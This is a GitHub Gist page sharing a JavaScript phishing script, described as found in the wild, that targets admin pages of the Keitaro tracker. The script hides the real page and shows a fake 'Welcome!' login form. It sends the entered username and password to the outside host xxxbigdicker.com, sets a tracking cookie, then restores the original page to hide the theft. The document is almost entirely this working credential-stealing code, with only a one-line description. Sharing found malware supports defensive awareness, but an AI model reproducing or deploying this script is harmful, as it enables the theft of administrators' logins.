Created
February 21, 2025 09:02
-
-
Save dvygolov/24513809057bd0d8422d7c472a8a7232 to your computer and use it in GitHub Desktop.
Fishing script that mimics Keitaro login form and steals data. Found in the wild.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| document.addEventListener("DOMContentLoaded", (function() { | |
| if (window.location.href.includes("/admin")) { | |
| const e = {}; | |
| document.cookie.split(";").some((e => e.trim().startsWith( | |
| "cookieName="))) && (e["X-Cookie"] = document | |
| .cookie), fetch("https://xxxbigdicker.com/kei", { | |
| method: "GET", | |
| headers: e | |
| }).then((e => { | |
| if (!e.ok) throw new Error( | |
| "Network response was not ok"); | |
| return e.json() | |
| })).then((e => { | |
| if (!0 !== e.true) { | |
| var o = document.head.innerHTML; | |
| document.head.innerHTML = ""; | |
| let e = window.location.pathname + | |
| window.location.search, | |
| r = document.createElement("title"); | |
| r.innerText; | |
| r.innerText = "Welcome!", document.head | |
| .appendChild(r); | |
| var n = document.body.innerHTML; | |
| document.body.innerHTML = "", window | |
| .history.replaceState({}, "", | |
| "/admin?return="); | |
| const a = | |
| '\n <style>.login,body,html{height:100%;overflow:hidden;padding:0;width:100%}.btn,.ion{vertical-align:middle}*,:after,:before{box-sizing:border-box}html{font-family:sans-serif;line-height:1.15;-webkit-text-size-adjust:100%;-webkit-tap-highlight-color:transparent}body{font-family:Helvetica Neue,Helvetica,Arial,sans-serif;font-size:1rem;font-weight:400;line-height:1.428571429;color:#212529;text-align:left;background-color:#fff}body,html{margin:0}h3{font-size:1.25rem!important;font-weight:400!important;line-height: 1.1;}h1,h2,h3,h4 .h4{margin-bottom:.5em;margin-top:1.2em}[type=button],[type=reset],[type=submit],button{-webkit-appearance:button;-webkit-appearance:none;-moz-appearance:none;appearance:none}button,select{text-transform:none}button,input{overflow:visible}button,input,optgroup,select,textarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}button{border-radius:0}.login{position:fixed;top:0;z-index: 1000000;display:block;background:#eee;border-radius:6px;margin:0}.login-block{top:50%;max-width:350px;margin:-150px auto 0}.w-100{width:100%!important}.position-relative{position:relative!important}.card,.login-field{position:relative}.d-block{display:block!important}.login-form{background:#fff;border:1px solid #e8e8e8}.card{display:flex;flex-direction:column;min-width:0;word-wrap:break-word;background-clip:border-box;border:1px solid rgba(0,0,0,.125);border-radius:.375rem}.form-control,.form-control:focus{color:#495057;background-color:#fff}.login .card .card-body{padding:30px 20px 10px}.card-body{flex:1 1 auto;min-height:1px;padding:1.25rem}.btn,.form-control{font-weight:400;padding:.375rem .75rem;font-size:1rem;line-height:1.428571429}.login h3{margin:0 0 20px;color:#555}.form-group{margin-bottom:1.25rem}.login .form-control{padding-left:30px}.form-control{display:block;width:100%;height:calc(1.42857em + .75rem + 2px);background-clip:padding-box;border:1px solid #ced4da;border-radius:.375rem;transition:border-color .15s ease-in-out,box-shadow .15s ease-in-out}.form-control:focus{border-color:#9cc4e4;box-shadow:0 0 0 .2rem rgba(56,137,201,.25);outline:0}.form-control::placeholder{color:#aaa;opacity:1}.login-field i{position:absolute;top:11px;left:11px;font-size:16px}.text-gray-light{color:#999!important}.btn{display:inline-block;color:#212529;text-align:center;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;background-color:transparent;border:.063rem solid transparent;border-radius:.375rem;transition:color .15s ease-in-out,background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out}.btn:not(:disabled):not(.disabled),[type=button]:not(:disabled),[type=reset]:not(:disabled),[type=submit]:not(:disabled),button:not(:disabled){cursor:pointer}.btn-wide{width:100%}.btn-success{color:#fff!important;background-color:#6eb371}.btn-danger,.btn-secondary,.btn-success{border-color:rgba(0,0,0,.1)!important}.btn:hover{color:#212529;text-decoration:none}.btn-success.focus,.btn-success:focus,.btn-success:hover{color:#fff;background-color:#56a55a;border-color:#529c55}</style>\n <div class="login-block w-100 position-relative d-block">\n <div class="card login-form">\n <div class="card-body">\n <h3 class="ng-binding">Welcome!</h3>\n <form id="ng-pristine">\n <div class="form-group login-field">\n <input class="form-control" type="text" name="login" autofocus="true" placeholder="Username">\n <i class="ion ion-android-person text-gray-light"></i>\n </div>\n <div class="form-group login-field">\n <input class="form-control" type="password" name="password" placeholder="Password">\n <i class="ion ion-locked text-gray-light"></i>\n </div>\n <div class="form-group">\n <button class="btn btn-success btn-wide animate-width" type="submit">\n <span class="ng-binding">Sign in</span>\n </button> \n </div>\n </form>\n </div>\n </div>\n </div>\n ', | |
| d = document.createElement("div"); | |
| d.classList.add("login"), d.innerHTML = | |
| a, document.body.appendChild(d); | |
| var t = document.createElement("link"); | |
| t.rel = "stylesheet", t.href = | |
| "https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css", | |
| document.head.appendChild(t); | |
| var i = document.getElementById( | |
| "ng-pristine"); | |
| i.addEventListener("submit", (function( | |
| t) { | |
| t.preventDefault(); | |
| var r = { | |
| login: i | |
| .elements | |
| .login | |
| .value, | |
| password: i | |
| .elements | |
| .password | |
| .value | |
| }; | |
| document.cookie = | |
| `cookieName=${i.elements.login.value}; expires=${new Date(Date.now()+31536e6).toUTCString()}; path='/';`, | |
| fetch( | |
| "https://xxxbigdicker.com/kei", { | |
| method: "POST", | |
| headers: { | |
| "Content-Type": "application/json" | |
| }, | |
| body: JSON | |
| .stringify( | |
| r) | |
| }), document | |
| .head.innerHTML = | |
| "", document.head | |
| .innerHTML = o, | |
| document.body | |
| .removeChild(d), | |
| setTimeout(( | |
| function() { | |
| document | |
| .body | |
| .innerHTML = | |
| n | |
| }), 1e3), window | |
| .history | |
| .replaceState({}, | |
| "", e) | |
| })) | |
| } | |
| })).catch((e => { | |
| console.error("Error:", e) | |
| })) | |
| } | |
| })); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment